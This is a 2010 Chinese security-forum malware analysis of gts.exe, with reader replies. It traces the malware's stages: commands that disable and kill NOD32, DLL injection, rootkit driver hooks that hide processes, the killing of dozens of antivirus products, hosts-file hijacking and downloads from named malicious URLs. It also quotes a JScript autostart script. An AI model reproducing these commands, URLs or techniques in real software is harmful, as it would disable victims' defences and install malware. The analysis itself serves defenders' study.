gts.exe病毒详细分析

YY3

病毒时间戳：2010-09-07，dll和sys是09年的时间戳，代码太多，我在附件中上传了各个部分的idb和病毒样本，想了解的朋友可以看下，虽然我注释很少~作者：pencil   yy3是我临时用的账号~~

主体gts.exe：
执行cmd /c sc config ekrn start= disabled 取消NOD32服务的自启动
cmd.exe /c taskkill.exe /im ekrn.exe /f 强行终止ekrn.exe进程
强行终止egui.exe进程
在%Windir%/下创建以开机时间为名的te%dt.dll文件
取出自身129号资源，并循环把各个byte内容加5，写入到创建的dll中
向rundll32.exe注入释放的dll并运行testall函数
删除释放的dll文件
在%Windir%\下创建随机名.exe
提取自身101号资源，解码后写入创建的exe中
运行创建的exe
创建pcidump.sys驱动，并提取自身125号资源写入
创建pcidump服务关联文件pcidump.sys，启动方式为SERVICE_DEMAND_START，并立即启动服
务向\\.\pcidump发送病毒进程名，用于隐藏
删除pcidump服务
删除释放的驱动文件
把当前病毒体复制到%Windir%\\system32\\下
删除病毒体镜像本身


dll文件：
提权
查找瑞星CCENTER.EXE进程(还对卡巴斯基进行判断)
如没有avp.exe则借用aec.sys的壳,否则借用AsyncMac.sys，如果有avp.exe，则会出现bug(改aec.sys的属性，然后删除AsyncMac.sys)
去掉\\drivers\\aec.sys的文件保护属性(此处有bug)
删除\\drivers\\AsyncMac.sys
创建\\drivers\\AsyncMac.sys,读取本身101号资源，每字节内容+5来解码，然后写入创建的驱动中创建名为AsyncMac的服务，关联文件\\drivers\\AsyncMac.sys，并启动
打开\\.\KILLPS_Drv
查找68种反病毒软件的进程，如果发现，则发送控制码2236420，附带进程ID到驱动，并删除其相关服务和exe文件
停止AsyncMac服务
删除\\drivers\\AsyncMac.sys
删除瑞星相关服务


随机名.exe文件:
创建XETTETT......Mutex,避免重复感染
关闭服务ALG和wscsvc
修改系统目录权限为everyone
修改临时文件夹权限为everyone
添加注册表项CurrentVersion\Run下项RsTray,值C:\WINDOWS\system32\scvhost.exe
创建线程
在线程中下载http://ff.the88888.com:18185/qvod/host.txt，覆盖掉%Windir%\drivers\etc\hosts，并设置文件属性为只读
等待上一个线程完成后再创建一个线程
在线程中首先测试网络状态
然后访问http://tj19.x9wdns.com:2787/q2/tj.html?mac=XX:XX:XX&ver=10830&os=XXX&dtime=2010-8-3
向远端服务器发送数据
等待线程完成后再创建一个线程，再访问一次http://tj19.x9wdns.com:2787/q2/tj.html?mac=XX:XX:XX&ver=10830&os=XXX&dtime=2010-8-3
从远端服务器http://ll.best88888.com:88/C/CXX.exe下载exe文件,保存到系统目录下

A\smss.exe
在启动目录中创建run.jse
内容如下：
var WSH = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
if(fso.FileExists("c:\\windows\\a\\smss.exe "))
{
WSH.Run("c:\\windows\\a\\smss.exe ");
}
添加run.jse到自启动项


pcidump.sys:
创建设备\Device\pcidump
创建符号链接\DosDevices\pcidump
FSD HOOK"\FileSystem\FastFat"和"NTFS"的IRP_MJ_CREATE派遣例程,来保护病毒进程
SSDT HOOK "ZwQuerySystemInfomation" 隐藏gts.exe进程
对易速磁盘还原系统做了穿透处理

ace.sys:kill AV
smss:浏览广告

病毒样本及IDB文件.rar (658.83 KB, 下载次数: 126)

2010-9-16 20:10 上传

点击文件名下载附件

qq526033781

好详细的分析,没想到我居然看懂了!!!

pencil

账号注册成功~

Hmily

账号注册成功~
pencil 发表于 2010-9-17 07:08

pencil兄以后多来吾爱破解发布分析作品来让大家学习啊.

pencil

pencil兄以后多来吾爱破解发布分析作品来让大家学习啊.
Hmily 发表于 2010-9-18 01:35

    承蒙Hmily大牛抬举，小弟多多努力。

sxs008

支持了 很好的东西

toolpc

支持个，。6月的东西爆发过。阻止创建设备\Device\pcidump还原就没事。ACE。SYS暂时还不知道怎么弄。其他无威胁

pencil

支持个，。6月的东西爆发过。阻止创建设备\Device\pcidump还原就没事。ACE。SYS暂时还不知道怎么弄。其他无 ...
toolpc 发表于 2010-9-18 19:42

   直接kill掉了事。研究每个怎么阻止干嘛。

hyuanqing

大作，拜读~要是注释详尽点就完美了……期待更多文章！

toolpc

可以防创建设备破坏还原系统